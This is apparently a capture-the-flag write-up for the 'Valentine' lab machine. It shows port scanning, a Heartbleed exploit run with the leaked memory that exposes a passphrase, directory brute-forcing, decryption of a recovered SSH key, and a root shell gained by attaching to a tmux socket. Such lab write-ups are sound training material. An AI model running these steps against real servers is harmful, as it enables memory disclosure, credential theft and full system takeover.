$ nmap -p- --min-rate 5000 10.129.85.98
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 08:30 EDT
Nmap scan report for 10.129.85.98
Host is up (0.0087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Heartbleed
Both the HTTP and HTTPS ports just show this image:
This is a direct hint to use the Heartbleed exploit (the symbol is literally right there!). This exploit takes advantage of the OpenSSL library, allowing attackers to steal information from the memory of the target server.
There are tons of PoCs online for this. I used this.
$ python2 exploit.py 10.129.85.98 -p 443
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.129.85.98:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.129.85.98:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==.u.....e......&
We can make out some base64 at the end, and when decoded it gives heartbleedbelievethehype.
Web Enumeration
I did a gobuster scan on the web services to see where we can use this thing.
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.129.85.98 -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.85.98
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/05/02 08:39:51 Starting gobuster in directory enumeration mode
===============================================================
/dev (Status: 301) [Size: 310] [--> http://10.129.85.98/dev/]
Found a /dev endpoint.
The first directory contains a lot of hex characters. We can download this to a file and convert it from hex to string. This would give a private SSH key:
Since we have a password, we can attempt to write decode the key via openssl.
$ openssl rsa -in privkey.txt -out unencrypted
Enter pass phrase for privkey.txt:
writing RSA key
$ chmod 600 unencrypted
Afterwards, just SSH in as hype using the key and grab the user flag.
Privilege Escalation
After we are in, we can view the bash history file because it is rather large:
hype@Valentine:~$ cat .bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
So tmux is on the machine and it might be running. tmux is a terminal multiplexer, which basically means that the terminal is running on another window within the machine. What we can do is just attach ourselves to the existing tmux process and get a root shell.
$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
